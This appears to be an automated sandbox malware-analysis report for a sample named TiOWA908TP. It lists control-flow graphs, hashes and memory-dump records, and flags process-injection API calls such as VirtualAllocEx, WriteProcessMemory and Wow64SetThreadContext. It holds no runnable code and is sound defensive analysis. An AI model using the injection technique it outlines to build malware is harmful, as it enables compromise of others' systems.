                                  control_flow_graph 1483 6e3f260-6e3f272 1485 6e3f274-6e3f295 1483->1485 1486 6e3f29c-6e3f2a0 1483->1486 1485->1486 1487 6e3f2a2-6e3f2a4 1486->1487 1488 6e3f2ac-6e3f2bb 1486->1488 1487->1488 1489 6e3f2c7-6e3f2f3 1488->1489 1490 6e3f2bd 1488->1490 1494 6e3f520-6e3f532 1489->1494 1495 6e3f2f9-6e3f2ff 1489->1495 1490->1489 1506 6e3f534-6e3f536 1494->1506 1507 6e3f53a-6e3f53d 1494->1507 1497 6e3f3d1-6e3f3d5 1495->1497 1498 6e3f305-6e3f30b 1495->1498 1499 6e3f3d7-6e3f3e0 1497->1499 1500 6e3f3f8-6e3f401 1497->1500 1498->1494 1502 6e3f311-6e3f31e 1498->1502 1499->1494 1503 6e3f3e6-6e3f3f6 1499->1503 1504 6e3f403-6e3f423 1500->1504 1505 6e3f426-6e3f429 1500->1505 1508 6e3f3b0-6e3f3b9 1502->1508 1509 6e3f324-6e3f32d 1502->1509 1511 6e3f42c-6e3f432 1503->1511 1504->1505 1505->1511 1512 6e3f538-6e3f539 1506->1512 1513 6e3f53e-6e3f567 1506->1513 1507->1513 1508->1494 1514 6e3f3bf-6e3f3cb 1508->1514 1509->1494 1510 6e3f333-6e3f34b 1509->1510 1515 6e3f357-6e3f369 1510->1515 1516 6e3f34d 1510->1516 1511->1494 1518 6e3f438-6e3f44b 1511->1518 1512->1507 1533 6e3f569 1513->1533 1534 6e3f57d-6e3f589 1513->1534 1514->1497 1514->1498 1515->1508 1524 6e3f36b-6e3f371 1515->1524 1516->1515 1518->1494 1519 6e3f451-6e3f461 1518->1519 1519->1494 1523 6e3f467-6e3f474 1519->1523 1523->1494 1525 6e3f47a-6e3f48f 1523->1525 1527 6e3f373 1524->1527 1528 6e3f37d-6e3f383 1524->1528 1525->1494 1532 6e3f495-6e3f4b8 1525->1532 1527->1528 1528->1494 1529 6e3f389-6e3f3ad 1528->1529 1532->1494 1542 6e3f4ba-6e3f4c5 1532->1542 1535 6e3f56c-6e3f56e 1533->1535 1536 6e3f595-6e3f5b1 1534->1536 1537 6e3f58b 1534->1537 1540 6e3f5b2-6e3f5ba 1535->1540 1541 6e3f570-6e3f57b 1535->1541 1537->1536 1548 6e3f5c2 1540->1548 1549 6e3f5bc-6e3f5c0 1540->1549 1541->1534 1541->1535 1544 6e3f4c7-6e3f4d1 1542->1544 1545 6e3f516-6e3f51d 1542->1545 1544->1545 1555 6e3f4d3-6e3f4e9 1544->1555 1550 6e3f5c3-6e3f5c6 1548->1550 1551 6e3f5ca-6e3f5cd 1548->1551 1549->1548 1553 6e3f5c8-6e3f5c9 1550->1553 1554 6e3f5ce 1550->1554 1551->1554 1553->1551 1556 6e3f5d0-6e3f5d6 1554->1556 1557 6e3f5dc-6e3f5df 1554->1557 1563 6e3f4f5-6e3f50e 1555->1563 1564 6e3f4eb 1555->1564 1556->1557 1558 6e3f5e1-6e3f5e5 1557->1558 1559 6e3f5f7-6e3f5f9 1557->1559 1561 6e3f5e7 1558->1561 1562 6e3f5ed 1558->1562 1582 6e3f5fb call 6fa0cd0 1559->1582 1583 6e3f5fb call 6e3f668 1559->1583 1565 6e3f5eb 1561->1565 1566 6e3f5e9 1561->1566 1562->1559 1563->1545 1564->1563 1565->1562 1566->1559 1567 6e3f601-6e3f605 1568 6e3f650-6e3f660 1567->1568 1569 6e3f607-6e3f61e 1567->1569 1569->1568 1575 6e3f620-6e3f62a 1569->1575 1577 6e3f63d-6e3f64d 1575->1577 1578 6e3f62c-6e3f63b 1575->1578 1578->1577 1582->1567 1583->1567
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482418539.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6e30000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (gq$d
                                  • API String ID: 0-4050097227
                                  • Opcode ID: 9b4bd53970ca6aa14fbfbe091437c4c40e99a6373ba6fc84ee5abc130d3a8937
                                  • Instruction ID: 0d93dae5b8445f8dc9cf6e368243b55bd49e68bdaf1dd24253593dce428fcb57
                                  • Opcode Fuzzy Hash: 9b4bd53970ca6aa14fbfbe091437c4c40e99a6373ba6fc84ee5abc130d3a8937
                                  • Instruction Fuzzy Hash: 14D16A35A00716DFCB54CF28C48896AB7F6FF88314B25DA69D45A8B661DB30FC46CB90
                                  Function 0140952C Relevance: 2.7, Strings: 2, Instructions: 221COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1584 140952c 1585 14097f0-1409809 1584->1585 1587 1409610-1409629 1585->1587 1588 140980f-1409838 1585->1588 1593 1409653 1587->1593 1594 140962b-1409637 1587->1594 1591 140953d-1409546 1588->1591 1592 140983e-1409849 1588->1592 1595 1409548 1591->1595 1596 140954f-1409550 1591->1596 1592->1591 1599 1409659-1409686 1593->1599 1597 1409641-1409647 1594->1597 1598 1409639-140963f 1594->1598 1595->1585 1595->1587 1595->1596 1600 1409926-1409927 1595->1600 1601 14097a8-14097ae 1595->1601 1602 140992c-1409940 1595->1602 1603 140984e-1409891 1595->1603 1604 14098af-1409910 1595->1604 1605 1409555-1409598 1595->1605 1606 1409896-14098aa 1595->1606 1607 14097d9-14097eb 1595->1607 1608 14095db-14095fa 1595->1608 1609 140969c 1595->1609 1596->1585 1610 1409651 1597->1610 1598->1610 1599->1591 1619 140968c-1409697 1599->1619 1600->1585 1617 14097ba-14097c7 1601->1617 1611 1409942-1409963 1602->1611 1604->1591 1638 1409916-1409921 1604->1638 1605->1585 1637 140959e-14095c5 1605->1637 1606->1611 1607->1591 1608->1607 1620 1409600-140960b 1608->1620 1614 14096a8-1409794 1609->1614 1610->1599 1624 1409965-140996e 1611->1624 1614->1591 1654 140979a-14097a3 1614->1654 1617->1585 1622 14097c9-14097d4 1617->1622 1619->1591 1620->1591 1622->1591 1628 1409970 1624->1628 1629 1409977-1409978 1624->1629 1628->1629 1631 1409993-14099c8 1628->1631 1632 14099d7 1628->1632 1633 140997a-140997b 1628->1633 1634 140997d-1409984 1628->1634 1629->1631 1631->1624 1647 14099ca-14099d5 1631->1647 1640 14099d8 1632->1640 1633->1632 1634->1631 1639 1409986-1409991 1634->1639 1637->1591 1646 14095cb-14095d6 1637->1646 1638->1591 1639->1624 1640->1640 1646->1591 1647->1624 1654->1591
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2456275495.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1400000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHcq$`Qcq
                                  • API String ID: 0-533219090
                                  • Opcode ID: ea2b100a07720ec8553a501f912148d784c5bb793eec07b89cc20a2701222059
                                  • Instruction ID: b61127fa98f5dd1b4f0f7048c698e778a7750c2313eceba710726a5de2f3e8e7
                                  • Opcode Fuzzy Hash: ea2b100a07720ec8553a501f912148d784c5bb793eec07b89cc20a2701222059
                                  • Instruction Fuzzy Hash: 85B1D0B0905229CFDB659F65C888BE9BBB1BB48304F5044EAD50EA3391DBB42EC5CF11
                                  Function 01409531 Relevance: 2.7, Strings: 2, Instructions: 214COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1655 1409531-1409537 1656 140953d-1409546 1655->1656 1657 1409548 1656->1657 1658 140954f-1409550 1656->1658 1657->1658 1659 1409926-1409927 1657->1659 1660 14097a8-14097ae 1657->1660 1661 140992c-1409940 1657->1661 1662 140984e-1409891 1657->1662 1663 14098af-1409910 1657->1663 1664 14097f0-1409809 1657->1664 1665 1409610-1409629 1657->1665 1666 1409555-1409598 1657->1666 1667 1409896-14098aa 1657->1667 1668 14097d9-14097eb 1657->1668 1669 14095db-14095fa 1657->1669 1670 140969c 1657->1670 1658->1664 1659->1664 1677 14097ba-14097c7 1660->1677 1671 1409942-1409963 1661->1671 1663->1656 1707 1409916-1409921 1663->1707 1664->1665 1685 140980f-1409838 1664->1685 1682 1409653 1665->1682 1683 140962b-1409637 1665->1683 1666->1664 1708 140959e-14095c5 1666->1708 1667->1671 1668->1656 1669->1668 1680 1409600-140960b 1669->1680 1673 14096a8-1409794 1670->1673 1687 1409965-140996e 1671->1687 1673->1656 1725 140979a-14097a3 1673->1725 1677->1664 1684 14097c9-14097d4 1677->1684 1680->1656 1692 1409659-1409686 1682->1692 1688 1409641-1409647 1683->1688 1689 1409639-140963f 1683->1689 1684->1656 1685->1656 1698 140983e-1409849 1685->1698 1695 1409970 1687->1695 1696 1409977-1409978 1687->1696 1697 1409651 1688->1697 1689->1697 1692->1656 1710 140968c-1409697 1692->1710 1695->1696 1700 1409993-14099c8 1695->1700 1701 14099d7 1695->1701 1702 140997a-140997b 1695->1702 1703 140997d-1409984 1695->1703 1696->1700 1697->1692 1698->1656 1700->1687 1718 14099ca-14099d5 1700->1718 1711 14099d8 1701->1711 1702->1701 1703->1700 1709 1409986-1409991 1703->1709 1707->1656 1708->1656 1717 14095cb-14095d6 1708->1717 1709->1687 1710->1656 1711->1711 1717->1656 1718->1687 1725->1656
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2456275495.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1400000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHcq$`Qcq
                                  • API String ID: 0-533219090
                                  • Opcode ID: cc8b2fb7e65b854c153259cf153d6bc5f25331381f3454a00d5831416c9eaa48
                                  • Instruction ID: 93c897406ba8049cd51d6a66384d1cd7ad1257e0f5506938423a13117f16dc49
                                  • Opcode Fuzzy Hash: cc8b2fb7e65b854c153259cf153d6bc5f25331381f3454a00d5831416c9eaa48
                                  • Instruction Fuzzy Hash: 26B1CFB0D05269CFDB659F65D888BE9BBB1BB48304F5044EAD50EA3291DBB42EC5CF10
                                  Function 06E3DC90 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1726 6e3dc90-6e3dc9a 1727 6e3dca2-6e3dcc8 1726->1727 1728 6e3dc9c-6e3dca1 1726->1728 1730 6e3ddb4-6e3ddd9 1727->1730 1731 6e3dcce-6e3dcd2 1727->1731 1728->1727 1738 6e3dde0-6e3de04 1730->1738 1732 6e3dce6-6e3dcea 1731->1732 1733 6e3dcd4-6e3dce0 1731->1733 1734 6e3dcf0-6e3dd07 1732->1734 1735 6e3de0b-6e3de30 1732->1735 1733->1732 1733->1738 1746 6e3dd1b-6e3dd1f 1734->1746 1747 6e3dd09-6e3dd15 1734->1747 1756 6e3de37-6e3de6a 1735->1756 1738->1735 1749 6e3dd21-6e3dd3a 1746->1749 1750 6e3dd4b-6e3dd64 1746->1750 1747->1746 1747->1756 1749->1750 1760 6e3dd3c-6e3dd3f 1749->1760 1761 6e3dd66-6e3dd8a 1750->1761 1762 6e3dd8d-6e3dd8f 1750->1762 1770 6e3de72-6e3de8a 1756->1770 1771 6e3de6c-6e3de70 1756->1771 1765 6e3dd48 1760->1765 1819 6e3dd92 call 6e3df20 1762->1819 1820 6e3dd92 call 6e3dc90 1762->1820 1821 6e3dd92 call 6e3de78 1762->1821 1764 6e3dd98-6e3ddb1 1765->1750 1774 6e3dec2-6e3dee7 1770->1774 1775 6e3de8c-6e3deac 1770->1775 1771->1770 1782 6e3deee-6e3df42 1774->1782 1775->1782 1783 6e3deae-6e3debf 1775->1783 1789 6e3dfe9-6e3e01a 1782->1789 1790 6e3df48-6e3df54 1782->1790 1802 6e3e022 1789->1802 1803 6e3e01c-6e3e021 1789->1803 1793 6e3df56-6e3df5d 1790->1793 1794 6e3df5e-6e3df72 1790->1794 1797 6e3dfe1-6e3dfe8 1794->1797 1798 6e3df74-6e3df84 1794->1798 1804 6e3df8a-6e3df99 1798->1804 1805 6e3e024-6e3e029 1802->1805 1806 6e3e02a-6e3e037 1802->1806 1803->1802 1813 6e3df9b-6e3dfb5 1804->1813 1814 6e3dfdc-6e3dfdf 1804->1814 1805->1806 1807 6e3e067-6e3e06d 1806->1807 1808 6e3e039-6e3e05d 1806->1808 1810 6e3e07f-6e3e08e 1807->1810 1811 6e3e06f-6e3e07c 1807->1811 1808->1807 1809 6e3e05f 1808->1809 1809->1807 1813->1814 1816 6e3dfb7-6e3dfc0 1813->1816 1814->1797 1814->1798 1817 6e3dfc2-6e3dfc5 1816->1817 1818 6e3dfcf-6e3dfdb 1816->1818 1817->1818 1819->1764 1820->1764 1821->1764
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482418539.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6e30000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (gq$(gq
                                  • API String ID: 0-3425431731
                                  • Opcode ID: 725bd5052f1b9cec43f17ec83d2ab5f9b2f7d917d166dcce94f33bd78d914c12
                                  • Instruction ID: f12269e2c7103a474aad86ddefb487e685a967373c44f2848f9f800635d46df4
                                  • Opcode Fuzzy Hash: 725bd5052f1b9cec43f17ec83d2ab5f9b2f7d917d166dcce94f33bd78d914c12
                                  • Instruction Fuzzy Hash: 2061EB31B003158FDB529F29D844AAE7BA6EFD5308F504569E9068B392CB35DC86CBA0
                                  Function 070BF880 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1822 70bf880-70bf892 1823 70bf898-70bf89a 1822->1823 1824 70bf986-70bf9ab 1822->1824 1825 70bf9b2-70bf9d6 1823->1825 1826 70bf8a0-70bf8ac 1823->1826 1824->1825 1838 70bf9dd-70bfa01 1825->1838 1831 70bf8ae-70bf8ba 1826->1831 1832 70bf8c0-70bf8d0 1826->1832 1831->1832 1831->1838 1832->1838 1839 70bf8d6-70bf8e4 1832->1839 1843 70bfa08-70bfa8d call 70bcd18 1838->1843 1842 70bf8ea-70bf8f1 call 70bf880 1839->1842 1839->1843 1845 70bf8f7-70bf940 1842->1845 1867 70bfa92-70bfaa0 call 70bebc0 1843->1867 1860 70bf963-70bf983 call 70bd9c0 1845->1860 1861 70bf942-70bf95b 1845->1861 1861->1860 1872 70bfab8-70bfaba 1867->1872 1873 70bfaa2-70bfaa8 1867->1873 1874 70bfaaa 1873->1874 1875 70bfaac-70bfaae 1873->1875 1874->1872 1875->1872
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2483051934.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70b0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (gq$Hgq
                                  • API String ID: 0-3303014377
                                  • Opcode ID: 181984dea86c26145c4a6020c4cd663b5be933aced32d9ad447dece1e512d4c1
                                  • Instruction ID: 556aea647cf2515d07d21a1a70c90e253b93cfcdd1015d88d4f681cca331215b
                                  • Opcode Fuzzy Hash: 181984dea86c26145c4a6020c4cd663b5be933aced32d9ad447dece1e512d4c1
                                  • Instruction Fuzzy Hash: 3451ABB07002028FD7A9AB38C85466E7BA2EFC9300B60456DD546DB3A0CF35ED86C7A1
                                  Function 06FA7530 Relevance: 2.6, Strings: 2, Instructions: 124COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482528632.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6fa0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (gq$Hgq
                                  • API String ID: 0-3303014377
                                  • Opcode ID: ce1540682ea2f6dc4546ae17248ad609a41e5d0deb4cf2d5b574738189f69522
                                  • Instruction ID: 5408533de852e2dcec4d8991b8b2b9834e2055dee19e35ec9d31a63f58c4c258
                                  • Opcode Fuzzy Hash: ce1540682ea2f6dc4546ae17248ad609a41e5d0deb4cf2d5b574738189f69522
                                  • Instruction Fuzzy Hash: 4241F0B6B042449FCB42EFA8D854D5A7FA6EFCA30071541AAE205CF372DA31DD01C791
                                  Function 06E3B6FD Relevance: 2.6, Strings: 2, Instructions: 122COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482418539.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6e30000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: d%iq$t[#)
                                  • API String ID: 0-3299798837
                                  • Opcode ID: 3c0704ad071c5f8af052be71997762628c433d88af8999ade5cf86edffe356b2
                                  • Instruction ID: 99fccc0a461a0d45d6f7a22057c5d46bba09957d09b4b7e40ed1790c7ebc9c29
                                  • Opcode Fuzzy Hash: 3c0704ad071c5f8af052be71997762628c433d88af8999ade5cf86edffe356b2
                                  • Instruction Fuzzy Hash: 76513C74A01219CFE754CF69DC58BAAB7B2FB48204F5082A9D40EE7394CB349D86CF50
                                  Function 06FA0D70 Relevance: 2.6, Strings: 2, Instructions: 109COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482528632.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6fa0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'cq$k[^_
                                  • API String ID: 0-2065981963
                                  • Opcode ID: 511bf2086298773b6d40c4e0a628fb3e6e223ce0bc17aaeab9a127121f13edf1
                                  • Instruction ID: 1c2a597062ffd9a69d13824ade020f93ec3f96ce0310d2fd6539f9fef4fb0800
                                  • Opcode Fuzzy Hash: 511bf2086298773b6d40c4e0a628fb3e6e223ce0bc17aaeab9a127121f13edf1
                                  • Instruction Fuzzy Hash: C8319476B002049FDF558F64E8449AABBB7EF88310B154069F60A9B362CE31FC56CB90
                                  Function 06E3B45C Relevance: 2.6, Strings: 2, Instructions: 109COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482418539.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6e30000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: d%iq$t[#)
                                  • API String ID: 0-3299798837
                                  • Opcode ID: 4be60c317626a8b74407733d83ba95314a2a152ebee98f9ef40b49e04f7745fb
                                  • Instruction ID: 982dacb5cdab55237234593297edbc072ef966b0f3f8b276050cbc35929e031b
                                  • Opcode Fuzzy Hash: 4be60c317626a8b74407733d83ba95314a2a152ebee98f9ef40b49e04f7745fb
                                  • Instruction Fuzzy Hash: 6E412A74A012188FE754CF69DC94BAAB7B6FB88200F5082E9D50EA7384CB349E85CF50
                                  Function 06FA2BE0 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482528632.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6fa0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,gq
                                  • API String ID: 0-3993090981
                                  • Opcode ID: 284f1e3e04f9fa4570e16f4461c449873fc9844215527f15bcbaacc10691a589
                                  • Instruction ID: e9c75f70d34e0fba1a21f286d7638434bc0c5a885253da7602a458872850f5d6
                                  • Opcode Fuzzy Hash: 284f1e3e04f9fa4570e16f4461c449873fc9844215527f15bcbaacc10691a589
                                  • Instruction Fuzzy Hash: BE52F7B5E102288FDB64CF69C985B9DBBF2BB88300F1541D9E509E7391DA319E81CF61
                                  Function 059D7734 Relevance: 1.9, APIs: 1, Instructions: 363memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 059D7A16
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: ed0f537ea79c6e16a7711bd55122f02ba87aa232fe5d3cd380ca9e3905e7b31e
                                  • Instruction ID: bdb11616406eeb9966dcf3038abf89c248b0908d0aec1303ac12186c73fdfb9b
                                  • Opcode Fuzzy Hash: ed0f537ea79c6e16a7711bd55122f02ba87aa232fe5d3cd380ca9e3905e7b31e
                                  • Instruction Fuzzy Hash: DC2156728002498FCB10CFAAC845BDEFFF5EF49320F14841AE519A7251CB399944CBA0
                                  Function 06E3CCA0 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482418539.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6e30000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (_cq
                                  • API String ID: 0-1257261198
                                  • Opcode ID: b17f2b3fd254ce9af2e02467ca3a0e21c2a773b78f3b5f8b939e6209de2cbd21
                                  • Instruction ID: 4a676f793663b853e80d700b599fa7fa610384ee7db3d1a142d6c86fd2cf9d98
                                  • Opcode Fuzzy Hash: b17f2b3fd254ce9af2e02467ca3a0e21c2a773b78f3b5f8b939e6209de2cbd21
                                  • Instruction Fuzzy Hash: DB227E35A00215DFDB44CF99D898AADB7F2FF89704F558059E906AB3A1CB71DC81CB90
                                  Function 059D5186 Relevance: 1.7, APIs: 1, Instructions: 203processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 059D536A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 05e94cf046a18492c8539a23598f55e0318a06d99a82c70f4a85f84d25fa4ff1
                                  • Instruction ID: 35b526b0cc4afb1e26d791d7f0a1dbbce02b8b6803840688bcc46c1f4512edbf
                                  • Opcode Fuzzy Hash: 05e94cf046a18492c8539a23598f55e0318a06d99a82c70f4a85f84d25fa4ff1
                                  • Instruction Fuzzy Hash: 64812271D0020A9FDB10CFA9D9857AEFBF6FF48310F15812AE859A7294DB748885CB91
                                  Function 059D5190 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 059D536A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: ca2943046d93caa7784777f884eae7e7c3da21ffd4e4a1b565e0fcc22a675437
                                  • Instruction ID: 88ace624cfdeb7c4451255700c984c26198c0f3f9c7e40db3a6873e062253994
                                  • Opcode Fuzzy Hash: ca2943046d93caa7784777f884eae7e7c3da21ffd4e4a1b565e0fcc22a675437
                                  • Instruction Fuzzy Hash: 1F813371D002099FDB10CFA9D9857AEFBF6FF48310F15812AE859A7294DB748885CB91
                                  Function 059D7C10 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 059D7CA8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: b403657565f8945583c51d6de8a2cce15b858dd8e1e4dc30a42ede73cca6ac27
                                  • Instruction ID: defc5d27df9dabefaa38ef7280b14298aaea3b317d00471909791b2822510bac
                                  • Opcode Fuzzy Hash: b403657565f8945583c51d6de8a2cce15b858dd8e1e4dc30a42ede73cca6ac27
                                  • Instruction Fuzzy Hash: 742157B29003499FCB10CFA9C885BEEBBF5FF48310F54842AE919A7341C7789944DBA1
                                  Function 059D7C18 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 059D7CA8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 59b4f2264721622aabcba82fd9e58022c6f391c505339ace1387b1b36fc43d2b
                                  • Instruction ID: 25ac39368df76d7314d0c84aa7a6bd8a8daa02d6aae294ef9d30835877664fac
                                  • Opcode Fuzzy Hash: 59b4f2264721622aabcba82fd9e58022c6f391c505339ace1387b1b36fc43d2b
                                  • Instruction Fuzzy Hash: 862125B69003499FCB10CFA9C985BEEBBF5FF48310F10842AE919A7240D7789944DBA0
                                  Function 059D7000 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 059D7086
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 2a730a1f8e361189839967f16939cabdae1a9e83765e2fa200c10e61fda0516f
                                  • Instruction ID: d0c18d3d085d10908a36a36b2e748cf4eb265273f8d5b0be71e4e9e5b744cb99
                                  • Opcode Fuzzy Hash: 2a730a1f8e361189839967f16939cabdae1a9e83765e2fa200c10e61fda0516f
                                  • Instruction Fuzzy Hash: 2C2137B2D003098FDB10DFA9C5857EEFBF4EF48320F14842AD559A7281CB789945CBA0
                                  Function 059D7008 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 059D7086
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 107bc16ba258f782cd8b76a682b1b5f1222a782afc0efb445611b1dab3621b3b
                                  • Instruction ID: 5b3072fc7f143ef5e7cfaadbba53d204540c647224d0f67986ccc01e88ac36e1
                                  • Opcode Fuzzy Hash: 107bc16ba258f782cd8b76a682b1b5f1222a782afc0efb445611b1dab3621b3b
                                  • Instruction Fuzzy Hash: DB2137719003098FDB10DFAAC8857EEFBF4EF49320F14842AD559A7241CB789945CBA0
                                  Function 06CD097B Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 06CD09F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2481610209.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6cd0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID:
                                  • API String ID: 544645111-0
                                  • Opcode ID: 5c41e5ffd1df42964a9af5a09c56ba9ddf4ec351babda52f463b1c0fd63b5d2d
                                  • Instruction ID: 8af4d5e9fe038d0cac08dfc8e1913dc01b6eb2ae2d80fbd85f55a5d57f6a63fb
